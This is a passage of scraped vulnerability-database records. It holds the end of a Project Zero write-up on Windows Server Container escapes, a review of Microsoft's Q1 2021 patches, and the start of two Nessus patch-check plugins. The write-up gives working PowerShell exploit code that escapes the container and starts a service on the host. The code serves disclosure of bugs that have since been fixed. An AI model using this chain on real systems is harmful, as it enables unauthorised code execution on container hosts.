= OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo); \n \n--- \n \nOkay, so the silo is coming from PsGetCurrentSilo. What does that do?\n\nPEJOB PsGetCurrentSilo() {\n\nPETHREAD Thread = PsGetCurrentThread();\n\nPEJOB silo = Thread->Silo;\n\nif (silo == (PEJOB)-3) {\n\nsilo = Thread->Tcb.Process->Job;\n\nwhile(silo) {\n\nif (silo->JobFlags & EJOB_SILO) {\n\nbreak;\n\n}\n\nsilo = silo->ParentJob;\n\n}\n\n}\n\nreturn silo;\n\n} \n \n--- \n \nA silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILO flag set. If a silo is found, it\u2019s returned from the function, otherwise NULL would be returned.\n\nThis is a problem, as it\u2019s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is:\n\n 1. Create an application silo.\n 2. Assign it to a process.\n 3. Fully access the root of the object manager namespace.\n\nThis is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you\u2019re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.\n\nThe exploit in PowerShell is pretty straightforward using my toolchain:\n\nPS> $root = Get-NtDirectory \"\\\"\n\nPS> $root.FullPath\n\n\\\n\nPS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory\n\nPS> Set-NtProcessJob $silo -Current\n\nPS> $root.FullPath\n\n\\Silos\\748 \n \n--- \n \nTo test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn\u2019t really a root directory the kernel makes it look like it is by returning a single backslash as the path.\n\nWe then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don\u2019t want and can\u2019t be done from a non-administrator account anyway. We can then assign the application silo to the process.\n\nNow we can check the root directory path again. We now find the root directory is really called \\Silos\\748 instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager.\n\n## Chaining the Exploits\n\nWe can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host\u2019s service control manager (SCM) using the ALPC port to create a new service. You don\u2019t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access.\n\nAs far as the host\u2019s SCM is concerned you\u2019re an administrator and so it\u2019ll grant you full access to create an arbitrary service. However, when that service starts it\u2019ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM\u2019s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container\u2019s SCM, not the hosts.\n\nTo get around this issue we can just access the RPC service directly using NtObjectManager\u2019s RPC commands. \n\nPS> $imp = $token.Impersonate()\n\nPS> $sym_path = \"$env:SystemDrive\\symbols\"\n\nPS> mkdir $sym_path | Out-Null\n\nPS> $services_path = \"$env:SystemRoot\\system32\\services.exe\"\n\nPS> $cmd = 'cmd /C echo \"Hello World\" > \\hello.txt'\n\n# You can also use the following to run a container based executable.\n\n#$cmd = Use-NtObject($f = Get-NtFile -Win32Path \"demo.exe\") {\n\n# \"\\\\\\\\.\\GLOBALROOT\" + $f.FullPath\n\n#}\n\nPS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path\n\nPS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path |\n\nSelect-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'\n\nPS> $client = Get-RpcClient $rpc\n\nPS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory\n\nPS> Set-NtProcessJob $silo -Current\n\nPS> Connect-RpcClient $client -EndpointPath ntsvcs\n\nPS> $scm = $client.ROpenSCManagerW([NullString]::Value, `\n\n[NullString]::Value, `\n\n[NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)\n\nPS> $service = $client.RCreateServiceW($scm.p3, \"GreatEscape\", \"\", `\n\n[NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `\n\n[NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)\n\nPS> $client.RStartServiceW($service.p15, 0, $null) \n \n--- \n \nFor this code to work it\u2019s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host\u2019s system drive.\n\n## Getting the Issues Fixed\n\nI have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.\n\nI decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I\u2019d find in Windows, it just required a special environment to function. This was [issue 2120](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2120>) which was fixed in February 2021 as [CVE-2021-24096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24096>). The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.\n\nThe issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn\u2019t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.\n\nThe situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn\u2019t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.\n\nAfter much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel\u2019s global symbolic link bug which kicked this all off still wouldn\u2019t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.\n\nI reported the three other issues (the ContainerUser issue was also considered to be in scope) as [2127](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2127>), [2128](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2128>) and [2129](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2129>). These were all fixed in March 2021 as [CVE-2021-26891](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26891>), [CVE-2021-26865](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26865>) and [CVE-2021-26864](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26864>) respectively.\n\nMicrosoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn\u2019t require administrator privileges. It will be classed as an elevation of privilege.\n\n## Conclusions\n\nThe decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there\u2019s just so much attack surface here. While I managed to get four issues fixed I doubt that they\u2019re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn\u2019t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation [here](<https://cloud.google.com/kubernetes-engine/docs/concepts/windows-server-gke>).\n\nObviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.\n", "modified": "2021-04-01T00:00:00", "published": "2021-04-01T00:00:00", "id": "GOOGLEPROJECTZERO:54650A68451B75723C5A9B2F8A177154", "href": "https://googleprojectzero.blogspot.com/2021/04/who-contains-containers.html", "type": "googleprojectzero", "title": "\nWho Contains the Containers?\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-03-26T00:33:35", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0986", "CVE-2020-1350", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1664", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1698", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1730", "CVE-2021-1732", "CVE-2021-24074", "CVE-2021-24078", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26891", "CVE-2021-27065"], "description": "Hello everyone! It has been 3 months since [my last review of Microsoft vulnerabilities for Q4 2020](<https://avleonov.com/2021/01/11/vulristics-vulnerability-score-automated-data-collection-and-microsoft-patch-tuesdays-q4-2020/>). In this episode I want to review the Microsoft vulnerabilities for the first quarter of 2021. There will be 4 parts: January, February, March and the vulnerabilities that were released between the Patch Tuesdays.\n\n\n\nI will be using the reports that I created with my [Vulristics tool](<https://github.com/leonov-av/vulristics>). This time I'll try to make the episodes shorter. I will describe only the most critical vulnerabilities. Links to the full reports are at the bottom of the blog post.\n\n## January 2021\n\n * All vulnerabilities: 83\n * Urgent: 0\n * Critical: 1\n * High: 28\n * Medium: 51\n * Low: 3\n\nSo, what was interesting in January. The only critical vulnerability was Microsoft Defender Remote Code Execution (CVE-2021-1647). "Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized."\n\nThe most interesting High level vulnerability is Microsoft splwow64 Elevation of Privilege (CVE-2021-1648). "According to Maddie Stone, a researcher at Google Project Zero credited with identifying this vulnerability, CVE-2021-1648 is a patch bypass for CVE-2020-0986, which was exploited in the wild as a zero-day."\n\nAlso, vendors paid attention to a large number of Remote Procedure Call Runtime Remote Code Executions (CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701) and Windows Remote Desktop Security Feature Bypass (CVE-2021-1669). But there are still no signs of exploitation for them. They are all labeled High in the Vulristics report.\n\nThere were no public exploits for any of the January vulnerabilities. January was a quiet and calm month.\n\n## February 2021\n\n * All vulnerabilities: 57\n * Urgent: 1\n * Critical: 2\n * High: 21\n * Medium: 31\n * Low: 2\n\nOne Urgent level vulnerability is Elevation of Privilege in Win32k component of Windows 10 and Windows Server 2019 (CVE-2021-1732). According to Microsoft, this vulnerability has been exploited in the wild. "Successful exploitation would elevate the privileges of an attacker, potentially allowing them to create new accounts, install programs, and view, modify or delete data". Public exploit in a form of Metasploit Module is found at Vulners ([Win32k ConsoleControl Offset Confusion](<https://vulners.com/packetstorm/packetstorm:161880>)).\n\nBut the situation with other critical vulnerabilities is interesting. None of the VM vendors mentioned them in their Patch Tuesday reviews.\n\n * This is Microsoft Exchange Server Spoofing Vulnerability (CVE-2021-24085), which is mentioned on [AttackerKB](<https://attackerkb.com/topics/taeSMPFD8J/cve-2021-24085>) and for which public exploit is found at Vulners ([Microsoft Exchange Server msExchEcpCanary CSRF / Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161528>)). This is not the same vulnerability that was exploited in HAFNIUM. We'll get to those vulnerabilities later.\n * Two other vulnerabilities, Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1698) and Microsoft Exchange Server (CVE-2021-1730), were exploitated in the wild. Therefore, the Vulristics Vulnerability Score is higher for them.\n\nIf vendors ignored these vulnerabilities, what vulnerabilities did they mention in their reports? \n\n * Primarily they wrote about Windows TCP/IP Remote Code Execution Vulnerabilities. "Microsoft released a set of fixes affecting Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074 and CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086). While there is no evidence that these vulnerabilities are exploited in wild, these vulnerabilities should be prioritized given their impact."\n * Also about Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-24078). "RCE flaw within Windows server installations when configured as a DNS server. Affecting Windows Server versions from 2008 to 2019, including server core installations, this severe flaw is considered \u201cmore likely\u201d to be exploited and received a CVSSv3 score of 9.8. This bug is exploitable by a remote attacker with no requirements for user interaction or a privileged account. As the vulnerability affects DNS servers, it is possible this flaw could be wormable and spread within a network."\n\nBut for these 2 vulnerabilities, there are still no public exploits or signs of active exploitation in the wild. This, of course, does not mean that these vulnerabilities do not need to be fixed. When we see the exploitation of these vulnerabilities the wild, it will be a disaster.\n\n## March 2021\n\n * All vulnerabilities: 82\n * Urgent: 0\n * Critical: 0\n * High: 36\n * Medium: 43\n * Low: 3\n\nAnd again, we see in the top not exactly the same vulnerabilities that VM vendors pointed out in their reviews.\n\n * Windows Container Execution Agent Elevation of Privilege Vulnerability (CVE-2021-26891). Just because a public exploit was found at Vulners ([Microsoft Windows Containers Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161734>)). \n * Internet Explorer Memory Corruption (CVE-2021-26411). "A memory corruption vulnerability in Internet Explorer that was exploited in the wild as a zero-day. In order to exploit the flaw, an attacker would need to host the exploit code on a malicious website and convince a user through social engineering tactics to visit the page, or the attacker could inject the malicious payload into a legitimate website". Exploitation in the wild is mentioned at [AttackerKB](<https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411>).\n\nBut we also see several Windows DNS Server Remote Code Executions . "All five of these CVEs were assigned 9.8 CVSSv3 scores and can be exploited by an unauthenticated attacker when dynamic updates are enabled. According to an analysis by researchers at McAfee, these CVEs are not considered \u201cwormable,\u201d yet they do evoke memories of CVE-2020-1350 (SIGRed), a 17-year-old wormable flaw patched in July 2020." In general, updating DNS Server is never a bad thing.\n\nAnd where is the most important thing? Naturally these are Exchange vulnerabilities and they were published between Patch Tuesdays. I made a special script to get such CVEs.\n\n## Other Q1 2021\n\n * All vulnerabilities: 85\n * Urgent: 0\n * Critical: 7\n * High: 5\n * Medium: 27\n * Low: 46\n\nThe 7 critical vulnerabilities are those Microsoft Exchange Server Remote Code Executions exploited in recent attacks. They have signs of exploitation in the wild at [AttackerKB](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855>) and [Microsoft](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). However, we still don't see public exploits.\n\n"[ProxyLogon](<https://proxylogon.com/>) is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution. All affected components are vulnerable by default! As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an only opened 443 port!"\n\nEverything is extremely serious with these vulnerabilities and if you have public unpatched Exchange servers, then there is a good chance that you have already been hacked. For example, by HAFNIUM.\n\n"Hafnium is a state-sponsored threat actor identified by the Microsoft Threat Intelligence Center (MSTIC)".\n\n"Recently, Hafnium has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. To date, Hafnium is the primary actor we\u2019ve seen use these exploits, which are discussed in detail [by MSTIC here](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what\u2019s called a web shell to control the compromised server remotely. Third, it would use that remote access \u2013 run from the U.S.-based private servers \u2013 to steal data from an organization\u2019s network."\n\nIn short, these Exchange vulnerabilities are the top.\n\nThe rest are Chrome vulnerabilities, simply because Microsoft's browser is now based on Chrome.\n\nYou can download full versions of reports here:\n\n * [ms_patch_tuesday_january2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_january2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_february2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_february2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_march2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_march2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_other_Q1_2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_other_Q1_2021_report_avleonov_comments.html>)\n", "modified": "2021-03-26T02:47:52", "published": "2021-03-26T02:47:52", "id": "AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "href": "http://feedproxy.google.com/~r/avleonov/~3/poQoyaBweKg/", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q1 2021", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-20T06:03:06", "description": "The remote Windows host is missing security update 5000803.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26864,\n CVE-2021-26865, CVE-2021-26866, CVE-2021-26868,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26891, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)", "edition": 7, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "title": "KB5000803: Windows Security Update (March 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-26901", "CVE-2021-26861", "CVE-2021-26864", "CVE-2021-26893", "CVE-2021-26869", "CVE-2021-26899", "CVE-2021-26875", "CVE-2021-26882", "CVE-2021-26866", "CVE-2021-26411", "CVE-2021-26881", "CVE-2021-26865", "CVE-2021-26884", "CVE-2021-26897", "CVE-2021-24107", "CVE-2021-26878", "CVE-2021-26862", "CVE-2021-26873", "CVE-2021-26898", "CVE-2021-26880", "CVE-2021-1640", "CVE-2021-26868", "CVE-2021-26896", "CVE-2021-26879", "CVE-2021-26872", "CVE-2021-26877", "CVE-2021-26886", "CVE-2021-26892", "CVE-2021-26891", "CVE-2021-26895", "CVE-2021-27063", "CVE-2021-26894", "CVE-2021-27077"], "modified": "2021-03-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000803.NASL", "href": "https://www.tenable.com/plugins/nessus/147222", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147222);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/19\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000803\");\n script_xref(name:\"MSFT\", value:\"MS21-5000803\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134\");\n\n script_name(english:\"KB5000803: Windows Security Update (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000803.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26864,\n CVE-2021-26865, CVE-2021-26866, CVE-2021-26868,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26891, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000803-os-build-14393-4283-711d10dd-adcb-490b-a640-aaa25009cfed\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41f8ea83\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000803.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26861\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000803'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000803])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-23T06:47:57", "description": "The remote Windows host is missing security update 5000808.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)", "edition": 10, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "title": "KB5000808: Windows 10 Version 1909 March 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-26901", "CVE-2021-1729", "CVE-2021-26861", "CVE-2021-26864", "CVE-2021-26869", "CVE-2021-26899", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26882", "CVE-2021-26866", "CVE-2021-26411", "CVE-2021-26890", "CVE-2021-26881", "CVE-2021-26865", "CVE-2021-26885", "CVE-2021-26884", "CVE-2021-24095", "CVE-2021-26871", "CVE-2021-26867", "CVE-2021-26863", "CVE-2021-24090", "CVE-2021-24107", "CVE-2021-26870", "CVE-2021-26878", "CVE-2021-26862", "CVE-2021-26873", "CVE-2021-26898", "CVE-2021-26880", "CVE-2021-1640", "CVE-2021-26900", "CVE-2021-26868", "CVE-2021-27085", "CVE-2021-26879", "CVE-2021-26872", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26892", "CVE-2021-26891", "CVE-2021-26860", "CVE-2021-26876", "CVE-2021-27077"], "modified": "2021-03-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000808.NASL", "href": "https://www.tenable.com/plugins/nessus/147220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147220);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/22\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24090\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26867\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n 